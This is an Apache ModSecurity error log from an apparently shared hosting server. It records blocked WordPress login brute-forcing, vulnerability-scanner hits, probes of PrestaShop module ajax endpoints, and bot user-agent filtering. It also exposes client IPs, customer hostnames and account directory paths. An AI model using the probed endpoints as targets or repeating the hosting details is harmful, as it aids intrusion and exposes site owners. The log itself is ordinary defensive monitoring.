[Tue May 26 16:21:28.119883 2026] [security2:error] [pid 795941:tid 796017] [remote 84.247.181.196:55490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV7L-2GQ_TLE_VHIp2F7AAAz0s"]
[Tue May 26 16:21:28.594600 2026] [security2:error] [pid 795941:tid 796168] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7MO2GQ_TLE_VHIp2F8wAAAOY"]
[Tue May 26 16:21:30.845006 2026] [security2:error] [pid 795941:tid 796149] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Mu2GQ_TLE_VHIp2GIgAAANM"]
[Tue May 26 16:21:31.730734 2026] [security2:error] [pid 795941:tid 796095] [client 195.178.110.48:47718] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahV7M-2GQ_TLE_VHIp2GQAAAAJ0"]
[Tue May 26 16:21:33.317715 2026] [security2:error] [pid 795941:tid 796178] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7NO2GQ_TLE_VHIp2GWQAAAPA"]
[Tue May 26 16:21:33.529479 2026] [security2:error] [pid 795941:tid 796128] [client 104.36.176.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7NO2GQ_TLE_VHIp2GXAAAAL4"]
[Tue May 26 16:21:35.133345 2026] [security2:error] [pid 795941:tid 796144] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Nu2GQ_TLE_VHIp2GiwAAAM4"]
[Tue May 26 16:21:37.181357 2026] [security2:error] [pid 795941:tid 796109] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7OO2GQ_TLE_VHIp2GvQAAAKs"]
[Tue May 26 16:21:38.646520 2026] [security2:error] [pid 795941:tid 796129] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Oe2GQ_TLE_VHIp2G6wAAAL8"]
[Tue May 26 16:21:40.577076 2026] [security2:error] [pid 795941:tid 795949] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7PO2GQ_TLE_VHIp2HKAAAuQc"]
[Tue May 26 16:21:40.983686 2026] [security2:error] [pid 795941:tid 796095] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7PO2GQ_TLE_VHIp2HKwAAAJ0"]
[Tue May 26 16:21:42.957238 2026] [security2:error] [pid 795941:tid 796174] [client 184.154.139.45:53366] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahV7Pu2GQ_TLE_VHIp2HWwAAAOw"]
[Tue May 26 16:21:43.167455 2026] [security2:error] [pid 795941:tid 796157] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Pu2GQ_TLE_VHIp2HXwAAANs"]
[Tue May 26 16:21:44.249205 2026] [security2:error] [pid 795941:tid 796140] [client 64.233.173.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahV7Pe2GQ_TLE_VHIp2HRQAAykQ"]
[Tue May 26 16:21:45.821034 2026] [security2:error] [pid 795941:tid 796153] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Qe2GQ_TLE_VHIp2HpwAAANc"]
[Tue May 26 16:21:46.918187 2026] [security2:error] [pid 795941:tid 796134] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Qu2GQ_TLE_VHIp2HvwAAAMQ"]
[Tue May 26 16:21:48.980532 2026] [security2:error] [pid 795941:tid 796183] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Q-2GQ_TLE_VHIp2H4AAAAPU"]
[Tue May 26 16:21:50.816828 2026] [security2:error] [pid 795941:tid 796138] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Re2GQ_TLE_VHIp2IHgAAAMg"]
[Tue May 26 16:21:52.448177 2026] [security2:error] [pid 795941:tid 796056] [remote 74.7.241.58:55384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV7SO2GQ_TLE_VHIp2IgAAA1nI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:21:53.296830 2026] [security2:error] [pid 795941:tid 796110] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7SO2GQ_TLE_VHIp2IgwAAAKw"]
[Tue May 26 16:21:54.392383 2026] [security2:error] [pid 795941:tid 796168] [client 173.239.198.59:64833] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV7Su2GQ_TLE_VHIp2IvQAA5h8"], referer: https://politica-global.com/
[Tue May 26 16:21:56.064496 2026] [security2:error] [pid 795941:tid 796166] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7S-2GQ_TLE_VHIp2I4gAAAOQ"]
[Tue May 26 16:21:57.073352 2026] [security2:error] [pid 795941:tid 796170] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7TO2GQ_TLE_VHIp2I9AAAAOg"]
[Tue May 26 16:21:57.455455 2026] [security2:error] [pid 795941:tid 796158] [client 14.165.214.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7TO2GQ_TLE_VHIp2I_QAAANw"]
[Tue May 26 16:21:59.564747 2026] [security2:error] [pid 795941:tid 796151] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Tu2GQ_TLE_VHIp2JIgAAANU"]
[Tue May 26 16:22:01.145791 2026] [security2:error] [pid 795941:tid 796182] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7UO2GQ_TLE_VHIp2JbAAAAPQ"]
[Tue May 26 16:22:03.152248 2026] [security2:error] [pid 795941:tid 796162] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Uu2GQ_TLE_VHIp2JoQAAAOA"]
[Tue May 26 16:22:03.302434 2026] [security2:error] [pid 795941:tid 795955] [remote 173.239.198.59:64833] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "politica-global.com"] [uri "/modules/leofeature/psajax.php"] [unique_id "ahV7U-2GQ_TLE_VHIp2JrAAA3Q0"], referer: https://politica-global.com/
[Tue May 26 16:22:04.536227 2026] [security2:error] [pid 795941:tid 795949] [remote 173.239.198.59:64833] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "politica-global.com"] [uri "/modules/appagebuilder/apajax.php"] [unique_id "ahV7VO2GQ_TLE_VHIp2JuQAAkwc"], referer: https://politica-global.com/
[Tue May 26 16:22:05.378383 2026] [security2:error] [pid 795941:tid 796151] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7VO2GQ_TLE_VHIp2JxQAAANU"]
[Tue May 26 16:22:06.664664 2026] [autoindex:error] [pid 795941:tid 796166] [client 198.235.24.166:59142] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:22:07.253009 2026] [security2:error] [pid 795941:tid 796145] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Vu2GQ_TLE_VHIp2J8QAAAM8"]
[Tue May 26 16:22:09.301386 2026] [security2:error] [pid 795941:tid 796190] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7WO2GQ_TLE_VHIp2KHQAAAPw"]
[Tue May 26 16:22:11.424883 2026] [security2:error] [pid 795941:tid 796103] [client 184.154.139.45:34746] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ahV7W-2GQ_TLE_VHIp2KVwAAAKU"]
[Tue May 26 16:22:11.501376 2026] [security2:error] [pid 795941:tid 796180] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Wu2GQ_TLE_VHIp2KRgAAAPI"]
[Tue May 26 16:22:13.042225 2026] [security2:error] [pid 795941:tid 796077] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7Xe2GQ_TLE_VHIp2KdAAAi0s"]
[Tue May 26 16:22:13.326812 2026] [security2:error] [pid 795941:tid 796172] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7XO2GQ_TLE_VHIp2KcQAAAOo"]
[Tue May 26 16:22:15.564935 2026] [security2:error] [pid 795941:tid 796163] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Xu2GQ_TLE_VHIp2KnAAAAOE"]
[Tue May 26 16:22:16.869762 2026] [security2:error] [pid 795941:tid 796122] [client 74.7.228.53:39568] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.baka-bau.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV7YO2GQ_TLE_VHIp2KzwAAuH0"]
[Tue May 26 16:22:16.943420 2026] [security2:error] [pid 795941:tid 796090] [client 74.7.241.146:34214] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV7YO2GQ_TLE_VHIp2K0wAAmH4"]
[Tue May 26 16:22:16.965237 2026] [security2:error] [pid 795941:tid 796188] [client 74.7.241.167:41938] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "corporatecargosolutions.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV7YO2GQ_TLE_VHIp2K1AAA-lQ"]
[Tue May 26 16:22:17.011887 2026] [security2:error] [pid 795941:tid 796127] [client 173.239.198.59:64833] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV7Wu2GQ_TLE_VHIp2KOQAAvSs"], referer: https://politica-global.com/
[Tue May 26 16:22:18.107090 2026] [security2:error] [pid 795941:tid 796175] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7YO2GQ_TLE_VHIp2KwAAAAO0"]
[Tue May 26 16:22:19.861837 2026] [security2:error] [pid 795941:tid 796169] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Yu2GQ_TLE_VHIp2K6QAAAOc"]
[Tue May 26 16:22:21.720250 2026] [security2:error] [pid 795941:tid 796160] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ZO2GQ_TLE_VHIp2LGAAAAN4"]
[Tue May 26 16:22:21.857522 2026] [security2:error] [pid 795941:tid 796085] [client 212.47.68.177:33210] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV7Ze2GQ_TLE_VHIp2LMAAAAJM"]
[Tue May 26 16:22:22.564806 2026] [security2:error] [pid 795941:tid 796072] [client 212.47.68.177:56816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV7Zu2GQ_TLE_VHIp2LSwAAAIY"]
[Tue May 26 16:22:22.636894 2026] [security2:error] [pid 795941:tid 796142] [client 184.154.139.45:38336] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/wpforms-lite/assets/lib/jquery.validate.min.js"] [unique_id "ahV7Zu2GQ_TLE_VHIp2LTwAAAMw"]
[Tue May 26 16:22:22.740855 2026] [security2:error] [pid 795941:tid 796122] [client 114.119.148.163:40587] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/robots.txt"] [unique_id "ahV7Zu2GQ_TLE_VHIp2LUAAAALg"]
[Tue May 26 16:22:23.186124 2026] [security2:error] [pid 795941:tid 796171] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Zu2GQ_TLE_VHIp2LQQAAAOk"]
[Tue May 26 16:22:23.405327 2026] [security2:error] [pid 795941:tid 796086] [client 113.179.143.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Zu2GQ_TLE_VHIp2LRAAAAJQ"]
[Tue May 26 16:22:25.853685 2026] [security2:error] [pid 795941:tid 796121] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7aO2GQ_TLE_VHIp2LeQAAALc"]
[Tue May 26 16:22:27.406436 2026] [security2:error] [pid 795941:tid 796084] [client 185.191.171.14:23048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/10/"] [unique_id "ahV7a-2GQ_TLE_VHIp2LrgAAAJI"]
[Tue May 26 16:22:27.406576 2026] [security2:error] [pid 795941:tid 796084] [client 185.191.171.14:23048] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/10/"] [unique_id "ahV7a-2GQ_TLE_VHIp2LrgAAAJI"]
[Tue May 26 16:22:27.469151 2026] [security2:error] [pid 795941:tid 796167] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7au2GQ_TLE_VHIp2LlwAAAOU"]
[Tue May 26 16:22:28.134760 2026] [security2:error] [pid 795941:tid 796079] [client 184.154.139.45:40098] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-includes/js/dist/i18n.min.js"] [unique_id "ahV7bO2GQ_TLE_VHIp2LuQAAAI0"]
[Tue May 26 16:22:29.322459 2026] [security2:error] [pid 795941:tid 796086] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7bO2GQ_TLE_VHIp2LvQAAAJQ"]
[Tue May 26 16:22:29.684465 2026] [security2:error] [pid 795941:tid 796151] [client 74.7.230.59:45060] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV7be2GQ_TLE_VHIp2L2wAA1QA"]
[Tue May 26 16:22:30.274899 2026] [security2:error] [pid 795941:tid 796180] [client 136.144.42.192:21367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.42.144.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahV7bu2GQ_TLE_VHIp2L4wAAAPI"]
[Tue May 26 16:22:31.194674 2026] [security2:error] [pid 795941:tid 796156] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7bu2GQ_TLE_VHIp2L6QAAANo"]
[Tue May 26 16:22:33.825161 2026] [security2:error] [pid 795941:tid 796078] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7cO2GQ_TLE_VHIp2MLAAAAIw"]
[Tue May 26 16:22:34.317925 2026] [security2:error] [pid 795941:tid 796195] [client 114.119.150.166:55491] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV7cu2GQ_TLE_VHIp2MWAAAAQE"], referer: http://glorodavionics.com/beta/index.php?route=product/product&manufacturer_id=11&page=4&product_id=111
[Tue May 26 16:22:35.381957 2026] [security2:error] [pid 795941:tid 796171] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7cu2GQ_TLE_VHIp2MbAAAAOk"]
[Tue May 26 16:22:35.952964 2026] [security2:error] [pid 795941:tid 796060] [remote 74.7.241.15:37324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-awards.php"] [unique_id "ahV7c-2GQ_TLE_VHIp2MoAAA03Y"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:22:37.624603 2026] [security2:error] [pid 795941:tid 796198] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7dO2GQ_TLE_VHIp2MvgAAAQQ"]
[Tue May 26 16:22:37.634330 2026] [security2:error] [pid 795941:tid 796013] [remote 45.32.67.165:55250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV7de2GQ_TLE_VHIp2M0wAAy0c"]
